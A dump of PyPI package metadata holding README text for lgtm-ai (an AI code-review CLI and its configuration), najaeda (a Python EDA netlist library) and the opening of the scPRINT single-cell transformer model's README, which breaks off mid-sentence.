You can run lgtm against a model available at a custom URL (say, models running with [ollama](https://ollama.com) at http://localhost:11434/v1). These models need to expose an OpenAI-compatible API. In that case, you need to pass the option `--model-url` (and you can choose to skip the option `--ai-api-key`). Check out the [pydantic-ai documentation](https://ai.pydantic.dev/models/openai/#openai-responses-api) for more information about how lgtm interacts with these models.
```sh
lgtm review \
--model llama3.2 \
--model-url http://localhost:11434/v1 \
...
https://github.com/group/repo/pull/1
```
### CI/CD Integration
lgtm is meant to be integrated into your CI/CD pipeline, so that PR authors can choose to request reviews by running the necessary pipeline step.
For GitLab, you can use this .gitlab-ci.yml step as inspiration:
```yaml
lgtm-review:
image:
name: docker.io/elementsinteractive/lgtm-ai
entrypoint: [""]
stage: ai-review
needs: []
rules:
- if: $CI_MERGE_REQUEST_ID
when: manual
script:
- lgtm review --git-api-key ${LGTM_GIT_API_KEY} --ai-api-key ${LGTM_AI_API_KEY} -v ${MR_URL}
variables:
MR_URL: "${CI_PROJECT_URL}/-/merge_requests/${CI_MERGE_REQUEST_IID}"
```
For GitHub, you can use the official [LGTM AI GitHub Action](https://github.com/marketplace/actions/lgtm-ai-code-review):
```yaml
- name: AI Code Review
uses: elementsinteractive/lgtm-ai-action@v1.0.0
with:
ai-api-key: ${{ secrets.AI_API_KEY }}
git-api-key: ${{ secrets.GITHUB_TOKEN }}
model: 'gpt-5'
pr-number: ${{ github.event.issue.number }}
```
You can also check out this repo's [lgtm workflow](./.github/workflows/lgtm.yml) for a complete example with comment triggers (`/lgtm review`).
### Configuration
You can configure lgtm through CLI arguments, environment variables, or a configuration file. lgtm uses a `.toml` file to configure how it works: it will autodetect an `lgtm.toml` file in the current directory, or you can pass a specific file path with the CLI option `--config <path>`.
Alternatively, lgtm also supports [pyproject.toml](https://packaging.python.org/en/latest/guides/writing-pyproject-toml/) files; you just need to nest the options inside `[tool.lgtm]`.
When it comes to preference for selecting options, lgtm follows this preference order:
`CLI options` > `lgtm.toml` > `pyproject.toml`
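The lookup order above can be sketched in a few lines of Python; this is an illustrative stand-in for the behaviour, not lgtm's actual implementation:

```python
def resolve_option(name, cli_options, lgtm_toml, pyproject_toml):
    """Return the first value found, honouring CLI > lgtm.toml > pyproject.toml."""
    for source in (cli_options, lgtm_toml, pyproject_toml):
        if name in source:
            return source[name]
    return None

# Hypothetical option sets from the three sources.
cli = {"model": "gpt-4.1"}
lgtm_toml = {"model": "gemini-2.5-flash", "publish": True}
pyproject = {"publish": False, "silent": True}

print(resolve_option("model", cli, lgtm_toml, pyproject))    # gpt-4.1 (CLI wins)
print(resolve_option("publish", cli, lgtm_toml, pyproject))  # True (lgtm.toml wins)
print(resolve_option("silent", cli, lgtm_toml, pyproject))   # True (pyproject fallback)
```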
<details>
<summary>Summary of options</summary>
| Option | Feature Group | Optionality | Notes/Conditions |
|----------------------|----------------------|---------------------|---------------------------------------------------------------------------------|
| model | Main (review + guide) | 🟢 Optional | AI model to use. Defaults to `gemini-2.5-flash` if not set. |
| model_url | Main (review + guide) | 🟡 Conditionally required | Only needed for custom/local models. |
| exclude | Main (review + guide) | 🟢 Optional | File patterns to exclude from review. |
| publish | Main (review + guide) | 🟢 Optional | If true, posts review as comments. Default: false. |
| output_format | Main (review + guide) | 🟢 Optional | `pretty` (default), `json`, or `markdown`. |
| silent | Main (review + guide) | 🟢 Optional | Suppress terminal output. Default: false. |
| ai_retries | Main (review + guide) | 🟢 Optional | Number of retries for AI agent queries. Default: 1. |
| ai_input_tokens_limit| Main (review + guide) | 🟢 Optional | Max input tokens for LLM. Default: 500,000. Use `"no-limit"` to disable. |
| git_api_key | Main (review + guide) | 🟡 Conditionally required | API key for git service (GitHub/GitLab). Can't be given through config file. Also available through env variable `LGTM_GIT_API_KEY`. Required if reviewing a PR URL from a remote repository service (GitHub, GitLab, etc.). |
| ai_api_key | Main (review + guide) | 🔴 Required* | API key for AI model. Can't be given through config file. Also available through env variable `LGTM_AI_API_KEY`. |
| technologies | Review Only | 🟢 Optional | List of technologies for reviewer expertise. |
| categories | Review Only | 🟢 Optional | Review categories. Defaults to all (`Quality`, `Correctness`, `Testing`, `Security`). |
| additional_context | Review Only | 🟢 Optional | Extra context for the LLM (array of prompts/paths/URLs). Can't be given through the CLI |
| compare | Review Only | 🟢 Optional | If reviewing local changes, what to compare against (branch, commit, range, etc.). CLI only. |
| issues_url | Issues Integration | 🟢 Optional | Enables issue context. If set, `issues_platform` becomes required. |
| issues_platform | Issues Integration | 🟡 Conditionally required | Required if `issues_url` is set. |
| issues_regex | Issues Integration | 🟢 Optional | Regex for issue ID extraction. Defaults to conventional commit compatible regex. |
| issues_api_key | Issues Integration | 🟢 Optional | API key for issues platform (if different from `git_api_key`). Can't be given through config file. Also available through env variable `LGTM_ISSUES_API_KEY`. |
| issues_user | Issues Integration | 🟡 Conditionally required | Username for accessing issues information. Only required for `issues_platform=jira` |
</details>
#### Main options
These options apply to both reviews and guides generated by lgtm.
- **model**: Choose which AI model you want lgtm to use. If not set, defaults to `gemini-2.5-flash`.
- **model_url**: When not using one of the specific supported models from the providers mentioned above, you can pass a custom URL where the model is deployed (e.g., for local/hosted models).
- **exclude**: Instruct lgtm to ignore certain files. This is important to reduce noise in reviews, but also to reduce the amount of tokens used for each review (and to avoid running into token limits). You can specify file patterns (e.g., `exclude = ["*.md", "package-lock.json"]`).
- **publish**: If `true`, lgtm will post the review as comments on the PR page. Default is `false`.
- **output_format**: Format of the terminal output of lgtm. Can be `pretty` (default), `json`, or `markdown`.
- **silent**: Do not print the review in the terminal. Default is `false`.
- **ai_retries**: How many times to call the LLM when queries do not succeed. By default, this is set to 1 (a single attempt, i.e. no retries at all).
- **ai_input_tokens_limit**: Set a limit on the input tokens sent to the LLM in total. Default is 500,000. To disable the limit, you can pass the string `"no-limit"`.
- **git_api_key**: API key to post the review in the source system of the PR. Can be given as a CLI argument, or as an environment variable (`LGTM_GIT_API_KEY`). You can omit this option if reviewing local changes.
- **ai_api_key**: API key to call the selected AI model. Can be given as a CLI argument, or as an environment variable (`LGTM_AI_API_KEY`).
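The `exclude` patterns mentioned above are glob-style, similar to shell wildcards. A minimal sketch of that kind of filtering, using the standard-library `fnmatch` (illustrative only; lgtm's exact matching rules may differ):

```python
from fnmatch import fnmatch

exclude = ["*.md", "package-lock.json"]  # patterns as in the exclude example

def is_excluded(path: str, patterns: list[str]) -> bool:
    """True if the path matches any glob-style exclude pattern."""
    return any(fnmatch(path, pattern) for pattern in patterns)

files = ["README.md", "src/app.py", "package-lock.json"]
print([f for f in files if not is_excluded(f, exclude)])  # ['src/app.py']
```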
#### Review options
These options are only used when performing reviews through the command `lgtm review`.
- **technologies**: Specify, as a list of free strings, which technologies lgtm specializes in. This can help direct the reviewer towards specific technologies. By default, lgtm won't assume any technology and will just review the PR considering itself an "expert" in it.
- **categories**: lgtm will, by default, evaluate several areas of the given PR (`Quality`, `Correctness`, `Testing`, and `Security`). You can choose any subset of these (e.g., if you are only interested in `Correctness`, you can configure `categories` so that lgtm does not evaluate the other missing areas).
- **additional_context**: TOML array of extra context to send to the LLM. It supports setting the context directly in the `context` field, passing a relative file path so that lgtm downloads it from the repository, or passing any URL from which to download the context. Each element of the array must contain `prompt`, and either `context` (directly injecting context) or `file_url` (for directing lgtm to download it from there).
- **compare**: When reviewing local changes (the positional argument to `lgtm` is a valid `git` path), you can choose what to compare against to generate a git diff. You can pass branch names, commits, etc. Default is `HEAD`. Only available as a CLI option.
#### Issues Integration options
See [Using Issue/User Story Information section](#using-issueuser-story-information).
- **issues_url**: The base URL of the issues or user story page to fetch additional context for the PR. If set, `issues_platform` becomes required.
- **issues_platform**: The platform for the issues (e.g., `github`, `gitlab`, `jira`). Required if `issues_url` is set.
- **issues_regex**: A regex pattern to extract the issue ID from the PR title or description. If omitted, lgtm uses a default regex compatible with conventional commits and common PR formats.
- **issues_api_key**: API key for the issues platform (if different from `git_api_key`). Can be given as a CLI argument, or as an environment variable (`LGTM_ISSUES_API_KEY`).
- **issues_user**: Username for accessing the issues platform (only necessary for `jira`). Can be given as a CLI argument, or as an environment variable (`LGTM_ISSUES_USER`).
#### Example `lgtm.toml`
```toml
technologies = ["Django", "Python"]
categories = ["Correctness", "Quality", "Testing", "Security"]
exclude = ["*.md"]
model = "gpt-4.1"
silent = false
publish = true
ai_retries = 1
ai_input_tokens_limit = 30000
[[additional_context]]
prompt = "These are the development guidelines for the team, ensure the PR follows them"
file_url = "https://my.domain.com/dev-guidelines.md"
[[additional_context]]
prompt = "CI pipeline for the repo. Do not report issues that this pipeline would otherwise catch"
file_url = ".github/workflows/pr.yml"
[[additional_context]]
prompt = "Consider these points when making your review"
context = '''
- We avoid using libraries and rely mostly on the stdlib.
- We follow the newest syntax available for Python (3.13).
'''
# Optional Issue/user story integration
issues_url = "https://github.com/your-org/your-repo/issues"
issues_platform = "github"
# The options below are optional even if the two above are provided
issues_regex = '(?:Fixes|Resolves) #(\d+)'
issues_api_key = "${GITHUB_TOKEN}"
```
## Contributing
### Running the project
This project uses [`just`](https://github.com/casey/just) recipes to do all the basic operations (testing the package, formatting the code, etc.).
Installation:
```sh
brew install just
# or
snap install --edge --classic just
```
It requires [poetry](https://python-poetry.org/docs/#installation).
These are the available commands for the justfile:
```
Available recipes:
help # Shows list of recipes.
venv # Generate the virtual environment.
clean # Cleans all artifacts generated while running this project, including the virtualenv.
test *test-args='' # Runs the tests with the specified arguments (any path or pytest argument).
t *test-args='' # alias for `test`
test-all # Runs all tests including coverage report.
format # Format all code in the project.
lint # Lint all code in the project.
pre-commit *precommit-args # Runs pre-commit with the given arguments (defaults to install).
spellcheck *codespell-args # Spellchecks your markdown files.
lint-commit # Lints commit messages according to conventional commit rules.
```
To run the tests of this package, simply run:
```sh
# All tests
just t
# A single test
just t tests/test_dummy.py
# Pass arguments to pytest like this
just t -k test_dummy -vv
```
### Managing requirements
`poetry` is the tool we use for managing requirements in this project. The generated virtual environment is kept within the directory of the project (in a directory named `.venv`), thanks to the option `POETRY_VIRTUALENVS_IN_PROJECT=1`. Refer to the [poetry documentation](https://python-poetry.org/docs/cli/) to see the list of available commands.
As a short summary:
- Add a dependency:
poetry add foo-bar
- Remove a dependency:
poetry remove foo-bar
- Update a dependency (within constraints set in `pyproject.toml`):
poetry update foo-bar
- Update the lockfile with the contents of `pyproject.toml` (for instance, when getting a conflict after a rebase):
poetry lock
- Check if `pyproject.toml` is in sync with `poetry.lock`:
poetry lock --check
### Commit messages
In this project we enforce [conventional commits](https://www.conventionalcommits.org) guidelines for commit messages. The usage of [commitizen](https://commitizen-tools.github.io/commitizen/) is recommended, but not required. Story numbers (JIRA, etc.) must go in the scope section of the commit message. Example message:
```
feat(#<issue-number>): add new feature x
```
Merge requests must be approved before they can be merged to the `main` branch, and all the steps in the `ci` pipeline must pass.
This project includes an optional pre-commit configuration. All necessary checks are always executed in the CI pipeline, but configuring pre-commit to run some of them locally can help catch errors earlier. To do so, simply execute the following just recipe:
```sh
just pre-commit
```
Feel free to create [GitHub Issues](https://github.com/elementsinteractive/lgtm-ai/issues) for any feature request, bug, or suggestion!
## Contributors ✨
Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tbody>
<tr>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/scastlara"><img src="https://avatars.githubusercontent.com/u/7606872?v=4?s=50" width="50px;" alt="Sergio Castillo"/><br /><sub><b>Sergio Castillo</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=scastlara" title="Code">💻</a> <a href="#design-scastlara" title="Design">🎨</a> <a href="#ideas-scastlara" title="Ideas, Planning, & Feedback">🤔</a> <a href="#maintenance-scastlara" title="Maintenance">🚧</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/jbozanowski"><img src="https://avatars.githubusercontent.com/u/114900?v=4?s=50" width="50px;" alt="Jakub Bożanowski"/><br /><sub><b>Jakub Bożanowski</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=jbozanowski" title="Code">💻</a> <a href="#ideas-jbozanowski" title="Ideas, Planning, & Feedback">🤔</a> <a href="#maintenance-jbozanowski" title="Maintenance">🚧</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/sacha-c"><img src="https://avatars.githubusercontent.com/u/3247529?v=4?s=50" width="50px;" alt="Sacha Brouté"/><br /><sub><b>Sacha Brouté</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=sacha-c" title="Code">💻</a> <a href="#ideas-sacha-c" title="Ideas, Planning, & Feedback">🤔</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/sdn4z"><img src="https://avatars.githubusercontent.com/u/13658011?v=4?s=50" width="50px;" alt="Daniel"/><br /><sub><b>Daniel</b></sub></a><br /><a href="#ideas-sdn4z" title="Ideas, Planning, & Feedback">🤔</a> <a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=sdn4z" title="Code">💻</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/Rooni"><img src="https://avatars.githubusercontent.com/u/916242?v=4?s=50" width="50px;" alt="Rooni"/><br /><sub><b>Rooni</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=Rooni" title="Code">💻</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://www.jjshanks.net/"><img src="https://avatars.githubusercontent.com/u/62661?v=4?s=50" width="50px;" alt="Joshua Shanks"/><br /><sub><b>Joshua Shanks</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=jjshanks" title="Code">💻</a></td>
</tr>
</tbody>
</table>
<!-- markdownlint-restore -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome!
| text/markdown | Sergio Castillo Lara | s.cast.lara@gmail.com | null | null | null | AI, code-review, linting, static-analysis, machine-learning, developer-tools, automation | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Topic :: Software Development :: Quality Assurance",
"Topic :: Software Development :: Code Generators",
"Topic :: Utilities",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Operating System :: OS Independent"
] | [] | null | null | <4,>=3.12 | [] | [] | [] | [
"click<9.0.0,>=8.1.7",
"fastmcp<3.0.0,>=2.12.4; extra == \"mcp\"",
"gitpython<4.0.0,>=3.1.45",
"httpx<0.29.0,>=0.28.1",
"jinja2<4.0.0,>=3.1.6",
"nest-asyncio<2.0.0,>=1.6.0; extra == \"mcp\"",
"pydantic<3.0.0,>=2.10.3",
"pydantic-ai-slim[anthropic,google,mistral,openai]<2.0.0,>=1.0.0",
"pydantic-settings<3.0.0,>=2.10.1",
"pygithub<3.0.0,>=2.6.1",
"python-gitlab<6.0.0,>=5.1.0",
"rich<14.0.0,>=13.9.4"
] | [] | [] | [] | [
"Changelog, https://github.com/elementsinteractive/lgtm-ai/releases",
"Documentation, https://github.com/elementsinteractive/lgtm-ai?tab=readme-ov-file#lgtm-ai",
"Homepage, https://github.com/elementsinteractive/lgtm-ai",
"Source, https://github.com/elementsinteractive/lgtm-ai",
"Tracker, https://github.com/elementsinteractive/lgtm-ai/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:17:59.046870 | lgtm_ai-1.5.2.tar.gz | 62,971 | 16/c3/95a6f09b4dccfbbd527fd297029ede6a72fcc9045b851195766f1f6350a8/lgtm_ai-1.5.2.tar.gz | source | sdist | null | false | 7af3bd7cdca42a9f3feb0bedc444b1bb | d560343ea24eec2ff089d389a70eb97528085b88889dbbf9f83d9907783502d9 | 16c395a6f09b4dccfbbd527fd297029ede6a72fcc9045b851195766f1f6350a8 | null | [
"LICENSE"
] | 214 |
2.2 | najaeda | 0.4.1 | Naja EDA Python package | najaeda Python Package
=======================
najaeda is a Python package that provides data structures and APIs for developing post-synthesis Electronic Design Automation (EDA) algorithms.
It offers a powerful yet simple framework designed to help software
and hardware developers efficiently navigate and manipulate EDA workflows.
With najaeda, you can:
* Explore Netlists with Ease:
* Navigate netlist hierarchy and connectivity effortlessly.
* Browse at multiple levels of detail:
* Bit-level or bus-level granularity.
* Instance-by-instance exploration or flattened views at the primitives level.
* Localized per-instance connections or comprehensive equipotential views.
* Perform ECO (Engineering Change Order) Transformations:
* Seamlessly apply and manage changes to your designs.
* Prototype EDA Ideas Quickly:
* Use an intuitive API to experiment with new EDA concepts and workflows.
* Develop Custom EDA Tools:
* Build fast, tailored tools for solving specific challenges without relying on costly, proprietary EDA software.
najaeda empowers developers to innovate, adapt, and accelerate their EDA
processes with minimal overhead.
najaeda is the Python counterpart of the `Naja C++ project <https://github.com/najaeda/naja>`_.
If you find this project useful, please consider `starring it on GitHub <https://github.com/najaeda/naja>`_ to show your support.
Feel free to reach out to us anytime at `contact@keplertech.io <mailto:contact@keplertech.io>`_.
Installation
------------
Install Naja EDA using pip:
.. code-block:: bash
pip install najaeda
Quick Start
-----------
To quickly explore what **najaeda** can do, launch the interactive tutorial notebook on Google Colab:
.. image:: https://colab.research.google.com/assets/colab-badge.svg
:target: https://colab.research.google.com/github/najaeda/najaeda-tutorials/blob/main/notebooks/01_getting_started.ipynb
:alt: Open in Colab
Documentation
-------------
Naja EDA online documentation is available `here <https://najaeda.readthedocs.io/en/latest/index.html>`_.
Examples
--------
A list of examples can be found in this
documentation `section <https://najaeda.readthedocs.io/en/latest/examples.html>`_.
Support
-------
If you encounter any issues or have questions, please report them on the
`Naja issue tracker <https://github.com/najaeda/naja/issues>`_.
You’re also welcome to join the discussion on Matrix:
.. image:: https://img.shields.io/badge/Matrix-Join%20Chat-success?logo=matrix
:target: https://matrix.to/#/#naja:fossi-chat.org
:alt: Join the Matrix chat
License
-------
This project is licensed under the Apache License 2.0. \
See the `LICENSE <https://github.com/najaeda/naja/blob/main/LICENSE>`_ file for details. | text/x-rst | null | Naja Authors <contact@keplertech.io> | null | null | Apache License 2.0 | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)"
] | [] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/najaeda/naja"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:17:27.952060 | najaeda-0.4.1-cp39-cp39-manylinux2014_x86_64.manylinux_2_17_x86_64.whl | 2,718,210 | ce/b7/91ac90b5a01cfe8663cf1c7a26d154d436c2cf57aac70eafa462b7727f35/najaeda-0.4.1-cp39-cp39-manylinux2014_x86_64.manylinux_2_17_x86_64.whl | cp39 | bdist_wheel | null | false | 7c22e3b82f8b582abcc1319fc5a8dc6d | edb808aa818585ffda2f457f22410449a60d1d787f3f46f36c21bdfbae2e0776 | ceb791ac90b5a01cfe8663cf1c7a26d154d436c2cf57aac70eafa462b7727f35 | null | [] | 1,664 |
2.4 | scprint | 2.3.8 | scPRINT is a Large Cell Model for Gene Network Inference, Denoising and more from scRNAseq data | > ℹ️ main place where scprint is built and maintained
> 🎊 The scPRINT-2 model has now been released:
> [https://github.com/cantinilab/scPRINT-2](https://github.com/cantinilab/scPRINT-2)
# scPRINT: Large Cell Model for scRNAseq data
[](https://codecov.io/gh/cantinilab/scPRINT)
[](https://github.com/cantinilab/scPRINT/actions/workflows/main.yml)
[](https://badge.fury.io/py/scprint)
[](https://pepy.tech/project/scprint)
[](https://pepy.tech/project/scprint)
[](https://pepy.tech/project/scprint)
[](https://img.shields.io/github/issues/cantinilab/scPRINT)
[](https://github.com/psf/black)
[](https://doi.org/10.5281/zenodo.14749466)
[](https://huggingface.co/jkobject/scPRINT)

scPRINT is a large transformer model built for the inference of gene networks
(connections between genes explaining the cell's expression profile) from
scRNAseq data.
It uses novel encoding and decoding of the cell expression profile and new
pre-training methodologies to learn a cell model.
scPRINT can be used to perform the following analyses in a zero-shot mode:
- **expression denoising**: increase the resolution of your scRNAseq data
- **cell embedding**: generate a low-dimensional representation of your dataset
- **label prediction**: predict the cell type, disease, sequencer, sex, and
ethnicity of your cells
- **gene network inference**: generate a gene network from any cell or cell
cluster in your scRNAseq dataset
It is a foundation model and can be fine-tuned to perform any other analysis
[Read the manuscript!](https://www.biorxiv.org/content/10.1101/2024.07.29.605556v1)
if you would like to know more about scPRINT. Have a look at some of my
[X-plainers](https://twitter.com/jkobject).

🎊 test scPRINT and scDataloader on this simple
[google collab](https://colab.research.google.com/drive/1CacoQDAwJn86tq2sBhUoZ6M-xAqsYFDI#scrollTo=Lb4E9IhQ7NK8)
## Table of Contents
- [scPRINT: Large Cell Model for scRNAseq data](#scprint-large-cell-model-for-scrnaseq-data)
- [Table of Contents](#table-of-contents)
- [scPRINT-2](#scprint-2)
- [Use `scPRINT`](#use-scprint)
- [try scPRINT in superbio.ai!](#try-scprint-in-superbioai)
- [try scPRINT on a google colab notebook!](#try-scprint-on-a-google-colab-notebook)
- [To know: lamin.ai](#to-know-laminai)
- [install](#install)
- [pytorch and GPUs](#pytorch-and-gpus)
- [follow up](#follow-up)
- [Usage](#usage)
- [scPRINT's basic commands](#scprints-basic-commands)
- [Documentation](#documentation)
- [Docker](#docker)
- [Simple tests:](#simple-tests)
- [FAQ](#faq)
- [I have a dataset and want a quick analysis:](#i-have-a-dataset-and-want-a-quick-analysis)
- [I have a dataset and want some more control over what is going on and which model to use:](#i-have-a-dataset-and-want-some-more-control-over-what-is-going-on-and-which-model-to-use)
- [What does my anndata need to contain to be run with scPRINT](#what-does-my-anndata-need-to-contain-to-be-run-with-scprint)
- [I want to generate gene networks from scRNAseq data:](#i-want-to-generate-gene-networks-from-scrnaseq-data)
- [I want to generate cell embeddings and cell label predictions from scRNAseq data:](#i-want-to-generate-cell-embeddings-and-cell-label-predictions-from-scrnaseq-data)
- [I want to denoise my scRNAseq dataset:](#i-want-to-denoise-my-scrnaseq-dataset)
- [I want to generate an atlas-level embedding](#i-want-to-generate-an-atlas-level-embedding)
- [I need to generate gene tokens using pLLMs](#i-need-to-generate-gene-tokens-using-pllms)
- [I want to re-train scPRINT from scratch on my own data](#i-want-to-re-train-scprint-from-scratch-on-my-own-data)
- [I want to fine-tune scPRINT on my own data](#i-want-to-fine-tune-scprint-on-my-own-data)
- [how can I find if scPRINT was trained on my data?](#how-can-i-find-if-scprint-was-trained-on-my-data)
- [can I use scPRINT on other organisms rather than human?](#can-i-use-scprint-on-other-organisms-rather-than-human)
- [how long does scPRINT takes? what kind of resources do I need? (or in alternative: can i run scPRINT locally?)](#how-long-does-scprint-takes-what-kind-of-resources-do-i-need-or-in-alternative-can-i-run-scprint-locally)
- [I have different scRNASeq batches. Should I integrate my data before running scPRINT?](#i-have-different-scrnaseq-batches-should-i-integrate-my-data-before-running-scprint)
- [where to find the input gene embeddings?](#where-to-find-the-input-gene-embeddings)
- [I want to extract output gene embeddings from scPRINT](#i-want-to-extract-output-gene-embeddings-from-scprint)
- [I have an issue with sqlite3](#i-have-an-issue-with-sqlite3)
- [Development](#development)
- [dev install](#dev-install)
- [Reproducibility](#reproducibility)
- [Building the Docker Image](#building-the-docker-image)
- [Pulling the Docker Image from Docker Hub](#pulling-the-docker-image-from-docker-hub)
- [Running the Docker Container](#running-the-docker-container)
- [Participate](#participate)
- [Work in progress (PR welcomed):](#work-in-progress-pr-welcomed)
## scPRINT-2
You can now also check out and use the
[scPRINT-2 model](https://github.com/cantinilab/scPRINT-2).
## Use `scPRINT`
For the moment, scPRINT has been tested on macOS and Linux (Ubuntu 20.04) with
Python 3.10. Its installation takes on average 10 minutes.
If you want to use flashattention2, note that it currently only supports triton
2.0 (MLIR version) and torch==2.0.0.
### try scPRINT in superbio.ai!
[HERE](https://app.superbio.ai/apps/67333115ed44f27eb717cf84)
### try scPRINT on a google colab notebook!
[Open in Colab](https://colab.research.google.com/drive/1CacoQDAwJn86tq2sBhUoZ6M-xAqsYFDI#scrollTo=Vj73HINSzKHL)
### To know: lamin.ai
To use scPRINT, you will need to use [lamin.ai](https://lamin.ai/). This is
needed to load biological information such as genes, cell types and organisms
(but also to manage the pre-training datasets, if this is something you want to
set up).
### install
To start, run the following (I would really push you to use uv, as it is so
much faster for the installation;
[here is how to install uv](https://docs.astral.sh/uv/getting-started/installation/)):
```bash
uv venv <env-name> --python 3.10  # scprint might work with python >3.10, but it is not tested
source <env-name>/bin/activate
# one of:
uv pip install scprint
# OR uv pip install scprint[dev]   # for the dev dependencies (building etc.)
# OR uv pip install scprint[flash] # to use flashattention2 with triton: only if you have a compatible GPU (e.g. not available for Apple GPUs for now, see https://github.com/triton-lang/triton?tab=readme-ov-file#compatibility)
# OR pip install scprint[dev,flash]
lamin init --storage ./testdb --name test --modules bionty
```
⚠️ `./testdb` is used in this example, but be mindful about where you store
your data: it can grow quite large with use, which matters if you are on a
partition with limited space.
If you are starting fresh with lamin and had to run `lamin init`, you will also
need to populate your ontologies. This is because scPRINT uses ontologies to
define its cell types, diseases, sexes, ethnicities, etc.
([link to view ontologies](https://www.ebi.ac.uk/ols4/ontologies/cl/classes/http%253A%252F%252Fpurl.obolibrary.org%252Fobo%252FCL_0000057))
You can do it via the command:
`scdataloader populate all`
(⚠️ it is OK to get warnings from this command)
or with this function:
```python
from scdataloader.utils import populate_my_ontology

populate_my_ontology()  # to populate everything (recommended) (can take 2-10 mins)

populate_my_ontology(  # the minimum for scprint to run some inferences (denoising, GRN inference)
    organisms=["NCBITaxon:10090", "NCBITaxon:9606"],
    sex=["PATO:0000384", "PATO:0000383"],
    celltypes=None,
    ethnicities=None,
    assays=None,
    tissues=None,
    diseases=None,
    dev_stages=None,
)
```
We make use of some additional packages we developed alongside scPRINT (they are
also shipped with scprint already).
Please refer to their documentation for more information:
- [scDataLoader](https://github.com/jkobject/scDataLoader): a dataloader for
training large cell models.
- [GRnnData](https://github.com/cantinilab/GRnnData): a package to work with
gene networks from single cell data.
- [benGRN](https://github.com/jkobject/benGRN): a package to benchmark gene
network inference methods from single cell data.
### pytorch and GPUs
scPRINT can run on machines without GPUs, but it will be slow. It is highly
recommended to use a GPU for inference.
Most of the time, everything works out of the box; otherwise, see the follow-up below:
#### follow up
If you are starting fresh with GPU programming, you need to have the required
drivers installed. You might also need to install a specific version of pytorch
that is compatible with your drivers (e.g. nvidia 550 drivers come with the
nvidia toolkit 11.7 or 11.8, which might mean you need to re-install a
different flavor of pytorch for things to work), e.g. using the command:
`pip install torch==2.2.0 torchvision==0.17.0 torchaudio==2.2.0 --index-url https://download.pytorch.org/whl/cu118`
in my case on linux.
I was able to test it with nvidia 11.7, 11.8 and 12.2.
If you do not have [triton](https://triton-lang.org/main/python-api/triton.html)
installed you will not be able to take advantage of GPU acceleration, but you
can still use the model on the CPU.
If you do not have GPUs and are loading from a checkpoint, you will need to
specify `transformer="normal"` in the `load_from_checkpoint` function, like so:
```python
model = scPrint.load_from_checkpoint(
'../data/temp/last-v1.ckpt', precpt_gene_emb=None,
transformer="normal")
```
You will learn more by following the
[get-started](https://cantinilab.github.io/scPRINT/notebooks/cancer_usecase/)
notebook.
## Usage
To get a sense of how scPRINT works, have a look at our
[get-started](https://cantinilab.github.io/scPRINT/notebooks/cancer_usecase/)
notebook.
To start, you will also need to download a checkpoint of a pretrained model,
such as medium-v1.5, from
[hugging face](https://huggingface.co/jkobject/scPRINT/):
```bash
$ hf download jkobject/scPRINT medium-v1.5.ckpt --local-dir .
```
### scPRINT's basic commands
This is a template of how you would use scPRINT most of the time:
```py
# import stuff
import scanpy as sc
from lightning.pytorch import Trainer
from scprint import scPrint
from scprint.tasks import Denoiser  # also Embedder, GNInfer
from scdataloader import DataModule

# setup a datamodule to train scprint from scratch
datamodule = DataModule(...)
# setup the model parameters
model = scPrint(...)
# to train / fit / test the model, setup a trainer
trainer = Trainer(...)
# call the fit function
trainer.fit(model, datamodule=datamodule)
# to do predictions, use Denoiser (or Embedder, GNInfer)
denoiser = Denoiser(...)
adata = sc.read_h5ad(...)
denoiser(model, adata=adata)
...
```
Or, from a bash command line, train and then fine-tune or analyse on your data:
```bash
$ scprint fit/train/predict/test/denoise/embed/gninfer --config config/[medium|large|vlarge] ...
```
to denoise a dataset:
```bash
$ scprint denoise --adata my_human_anndata.h5ad --ckpt_path medium-v1.5.ckpt --species "NCBITaxon:9606" --output_filename denoised.h5ad
```
to do embedding and classification on a dataset (the current version also
computes a PCA and UMAP, so it might need a lot of RAM if run as is):
```bash
$ scprint embed --adata my_human_anndata.h5ad --ckpt_path medium-v1.5.ckpt --species "NCBITaxon:9606" --output_filename embedded.h5ad
```
to do gene network inference on a dataset:
```bash
$ scprint gninfer --adata my_human_anndata.h5ad --ckpt_path medium-v1.5.ckpt --species "NCBITaxon:9606" --cell_type 'cell_type_name_from-cell_type-obs_col' --output_filename grn.h5ad
```
to finetune scPRINT on your data:
```bash
$ scprint fit --config config/base_v2.yml --config config/pretrain_large.yml --ckpt_path large-v1.ckpt
```
find out more about the commands by running `scprint --help` or
`scprint [command] --help`.
more examples of using the command line are available in the
[docs](./docs/usage.md).
## Documentation
For more information on usage please see the documentation in
